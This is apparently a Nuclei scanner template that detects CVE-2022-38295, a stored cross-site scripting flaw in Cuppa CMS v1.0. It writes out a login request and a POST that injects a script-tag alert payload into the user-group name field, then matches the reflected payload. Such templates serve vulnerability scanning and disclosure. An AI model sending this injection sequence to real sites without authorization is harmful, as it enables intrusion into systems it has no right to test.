2023-04-21 08:56:01 +00:00
id : CVE-2022-38295
info :
name : Cuppa CMS v1.0 - Cross Site Scripting
author : theamanrawat
severity : medium
description : |
Cuppa CMS v1.0 was discovered to contain a cross-site scripting vulnerability at /table_manager/view/cu_user_groups. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Name field under the Add New Group function.
reference :
- https://github.com/CuppaCMS/CuppaCMS
- https://nvd.nist.gov/vuln/detail/CVE-2022-38295
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score : 6.1
cve-id : CVE-2022-38295
cwe-id : CWE-79
metadata :
2023-04-28 08:11:21 +00:00
max-request : 3
2023-06-04 08:13:42 +00:00
verified : true
2023-04-21 08:56:01 +00:00
tags : cve,cve2022,xss,cuppa,authenticated
2023-04-27 04:28:59 +00:00
http :
2023-04-21 08:56:01 +00:00
- raw :
- |
POST / HTTP/1.1
Host : {{Hostname}}
Content-Type : application/x-www-form-urlencoded
user={{username}}&password={{password}}&language=en&task=login
- |
POST /components/table_manager/classes/functions.php HTTP/1.1
Host : {{Hostname}}
Content-Type : application/x-www-form-urlencoded; charset=UTF-8
id_field=0&name_field="><script>alert(document.domain)</script>&admin_login_field=1&site_login_field=1&enabled_field=1&view=cu_user_groups&function=saveAdminTable
- |
POST /components/table_manager/ HTTP/1.1
Host : {{Hostname}}
Content-Type : application/x-www-form-urlencoded; charset=UTF-8
path=component%2Ftable_manager%2Fview%2Fcu_user_groups&uniqueClass=
cookie-reuse : true
matchers-condition : and
matchers :
- type : word
part : body_3
words :
- '"><script>alert(document.domain)</script>'
- 'cuppa_html'
condition : and
- type : word
part : header_3
words :
- "text/html"
- type : status
status :
- 200